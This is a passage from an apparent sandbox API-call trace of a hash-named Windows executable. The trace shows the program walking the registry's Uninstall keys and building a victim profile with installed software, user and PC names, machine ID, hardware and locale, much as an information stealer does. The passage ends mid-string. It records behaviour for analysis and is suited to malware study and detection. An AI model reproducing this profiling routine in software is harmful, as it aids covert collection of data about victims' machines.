14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n" [0208.101] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.101] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0xf, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.101] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757") returned 104 [0208.101] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.101] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.101] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.101] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x10, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.102] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173") returned 104 [0208.102] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.102] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.102] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.102] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x11, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.102] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860") returned 104 [0208.102] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.102] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.102] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.102] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x12, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.102] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655") returned 104 [0208.102] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.102] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.102] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.103] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x13, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.103] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743") returned 104 [0208.103] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.103] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.103] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.103] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x14, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.103] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063") returned 104 [0208.103] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.103] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.103] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.103] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x15, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.103] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573") returned 103 [0208.103] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.104] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.104] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.104] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x16, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.104] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}") returned 94 [0208.104] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.104] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpcbData=0x19ce18*=0x3c) returned 0x0 [0208.104] lstrlenA (lpString="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508") returned 59 [0208.104] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n", lpString2="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508" [0208.104] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="14.25.28508", lpcbData=0x19ce18*=0xc) returned 0x0 [0208.104] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 " [0208.104] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 ", lpString2="14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508" [0208.104] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n" [0208.105] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.105] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x17, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.105] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 94 [0208.105] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.105] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0x19ce18*=0x3d) returned 0x0 [0208.105] lstrlenA (lpString="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030") returned 60 [0208.105] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n", lpString2="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 